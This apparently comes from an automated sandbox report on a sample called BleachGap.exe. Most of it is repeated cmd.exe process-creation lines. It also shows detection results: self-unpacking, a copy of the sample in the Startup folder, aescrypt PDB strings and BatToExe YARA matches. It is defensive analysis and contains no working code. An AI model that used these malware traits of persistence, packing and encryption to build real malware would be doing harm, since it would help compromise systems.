Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\BleachGap.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source:	Binary string: yb.pdbr source: powershell.exe, 00000025.00000002.292537088.0000028CAE9C9000.00000004.00000020.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000025.00000002.307231149.0000028CC8A6A000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\paulej\Documents\Source\AESCrypt\Windows\Console\Win32\Release\aescrypt.pdb source: BleachGap.exe, 00000000.00000002.549484552.0000000000B40000.00000004.00000001.sdmp, BleachGap.exe, 00000011.00000003.425794983.0000000002770000.00000004.00000001.sdmp, aescrypt.exe.0.dr
Source:	Binary string: .pdbZ source: powershell.exe, 00000025.00000002.292537088.0000028CAE9C9000.00000004.00000020.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000025.00000002.307231149.0000028CC8A6A000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\paulej\Documents\Source\AESCrypt\Windows\Console\Win32\Release\aescrypt.pdb source: BleachGap.exe, 00000000.00000002.549484552.0000000000B40000.00000004.00000001.sdmp, BleachGap.exe, 00000011.00000003.425794983.0000000002770000.00000004.00000001.sdmp, aescrypt.exe.0.dr

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\BleachGap.exe	Unpacked PE file: 0.2.BleachGap.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe	Unpacked PE file: 17.2.BleachGap.exe.400000.0.unpack

Yara detected BatToExe compiled binary

Show sources

Source: Yara match	File source: 00000009.00000002.209880773.0000028936510000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.229538128.0000021CA1C14000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.291791173.0000028CAE874000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.237073796.000001F542870000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.290262642.0000028CC8801000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.214873488.00000198B6224000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.224603355.00000232B79A0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.292108463.0000028CAE923000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.224615954.00000232B79D0000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.214867220.00000198B6220000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.425889191.0000000002767000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.224607469.00000232B79A4000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.224599691.00000232B7980000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.550028845.0000000002790000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.228657668.000002264DB20000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.204799183.00000220B20E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.242656801.0000021C508D4000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.283432554.0000028CC8A25000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.291773118.0000028CAE870000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.425874542.0000000002870000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.228672912.000002264DB28000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.206125663.00000258A5910000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.232578649.00000291A8090000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.204762520.00000220B1DF6000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.238957668.000002084EBE0000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.549851514.0000000002590000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.235387887.000002154B140000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.203556300.00000172CC1B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.229530102.0000021CA1C10000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.425898742.0000000000810000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.250933814.00000000017D0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.211375187.000002567D7F0000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.235350187.000002154B000000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.224188278.00000232B7A1F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.292271084.0000028CAE949000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.209683392.0000028936250000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.213282265.000002899B580000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.213129651.000002899B2D0000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.306884834.0000028CC8801000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.250648318.0000000000A80000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.242662946.0000021C508E0000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.550041305.0000000002797000.00000004.00000040.sdmp, type: MEMORY
